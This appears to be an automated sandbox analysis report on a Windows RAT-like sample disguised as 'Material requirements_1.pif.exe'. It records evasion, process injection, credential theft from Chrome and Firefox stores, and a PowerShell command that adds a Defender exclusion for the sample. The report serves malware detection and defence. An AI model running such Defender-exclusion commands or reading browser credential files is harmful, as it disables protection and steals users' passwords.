                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, lW7pBiMxd5BWrJjUJI.csHigh entropy of concatenated method names: 'JXvG3hwEn9', 'MHbGZbTNFF', 'ToString', 'WyWGJJnTWe', 'q9CGqjfRUs', 'NNAGxOi13Z', 'AS6GcVcITs', 'mgoGO7d07y', 'HJfGKCRwAN', 'hZmGnpHCK7'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, vT6jPTRZvC5B0IBT6M.csHigh entropy of concatenated method names: 'O5LwUuQIZ6', 'LBDwXGDySg', 'xxpwhHeca5', 'J8gwfXKQxg', 'yQfwsWpdZM', 'qNVwNc6jD4', 'sZ6wgcXYgW', 'FZEw5WunDX', 'ufEwiZNuUZ', 'OwZwBqfrwf'
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_00406128 ShellExecuteW,URLDownloadToFileW,7_2_00406128
                Source: C:\Windows\System32\wbem\WMIADAP.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WmiApRpl\Performance
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_00419BD4

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041BCF3
                Source: C:\Windows\System32\wbem\WMIADAP.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance Data
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIADAP.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIADAP.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_0040E54F Sleep,ExitProcess,7_2_0040E54F
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Memory allocated: 2CA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Memory allocated: 2D70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Memory allocated: 4D70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Memory allocated: 8DF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Memory allocated: 9DF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Memory allocated: 9FF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Memory allocated: AFF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Memory allocated: B650000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Memory allocated: C650000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Memory allocated: D650000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,7_2_004198D2
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6445
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3271
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Window / User API: threadDelayed 1817
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Window / User API: threadDelayed 8127
                Source: C:\Windows\System32\wbem\WMIADAP.exe | Window / User API: threadDelayed 2045
                Source: C:\Windows\System32\wbem\WMIADAP.exe | Window / User API: threadDelayed 898
                Source: C:\Windows\System32\wbem\WMIADAP.exe | Window / User API: threadDelayed 1067
                Source: C:\Windows\System32\wbem\WMIADAP.exe | Window / User API: threadDelayed 715
                Source: C:\Windows\System32\wbem\WMIADAP.exe | Window / User API: threadDelayed 1294
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | API coverage: 8.8 %
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe TID: 5824 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe TID: 6688 | Thread sleep count: 1817 > 30
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe TID: 6688 | Thread sleep time: -5451000s >= -30000s
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe TID: 6688 | Thread sleep count: 8127 > 30
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe TID: 6688 | Thread sleep time: -24381000s >= -30000s
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5796 | Thread sleep count: 2045 > 30
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5796 | Thread sleep count: 898 > 30
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5796 | Thread sleep count: 1067 > 30
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5796 | Thread sleep count: 715 > 30
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5796 | Thread sleep count: 1294 > 30
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040B335
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,7_2_0041B43F
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040B53A
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_0044D5F9 FindFirstFileExA,7_2_0044D5F9
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,7_2_004089A9
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_00406AC2 FindFirstFileW,FindNextFileW,7_2_00406AC2
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,7_2_00407A8C
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00418C79
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,7_2_00408DA7
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00406F06
                Source: Material requirements_1.pif.exe, 00000007.00000002.4529165570.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | API call chain: ExitProcess graph end node (graph_7-47956)
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0043A66D
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041BCF3
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_00442564 mov eax, dword ptr fs:[00000030h]7_2_00442564
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_0044E93E GetProcessHeap,7_2_0044E93E
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00434178
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00433B54
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Code function: 7_2_00433CE7 SetUnhandledExceptionFilter,7_2_00433CE7
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Memory written: C:\Users\user\Desktop\Material requirements_1.pif.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 7_2_00410F36
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_00418764 mouse_event, 7_2_00418764
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Process created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Process created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Process created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_00433E1A cpuid 7_2_00433E1A
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: GetLocaleInfoW, 7_2_004510CA
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: EnumSystemLocalesW, 7_2_004470BE
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_004511F3
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: GetLocaleInfoW, 7_2_004512FA
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_004513C7
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: GetLocaleInfoW, 7_2_004475A7
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: GetLocaleInfoA, 7_2_0040E679
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 7_2_00450A8F
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: EnumSystemLocalesW, 7_2_00450D52
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: EnumSystemLocalesW, 7_2_00450D07
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: EnumSystemLocalesW, 7_2_00450DED
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_00450E7A
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Queries volume information: C:\Users\user\Desktop\Material requirements_1.pif.exe VolumeInformation
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_00404915 GetLocalTime,CreateEventA,CreateThread, 7_2_00404915
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_0041A7B2 GetComputerNameExW,GetUserNameW, 7_2_0041A7B2
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: 7_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 7_2_0044801F
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 7_2_0040B21B
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 7_2_0040B335
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: \key3.db 7_2_0040B335

Remote Access Functionality

Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0PJCBG
Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR
Source: C:\Users\user\Desktop\Material requirements_1.pif.exe; Code function: cmd.exe 7_2_00405042
MITRE ATT&CK matrix, listed per tactic (the number in parentheses is the count the report shows next to a technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
Execution: Native API (1); Command and Scripting Interpreter (1); Service Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: DLL Side-Loading (1); Windows Service (11); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (11); Process Injection (121); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1); Bypass User Account Control (1); File Deletion (1); Masquerading (11); Modify Registry (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (121)
Credential Access: OS Credential Dumping (1); Input Capture (111); Credentials In Files (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (4); System Information Discovery (33); Security Software Discovery (21); Virtualization/Sandbox Evasion (31); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1); System Network Connections Discovery; Process Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
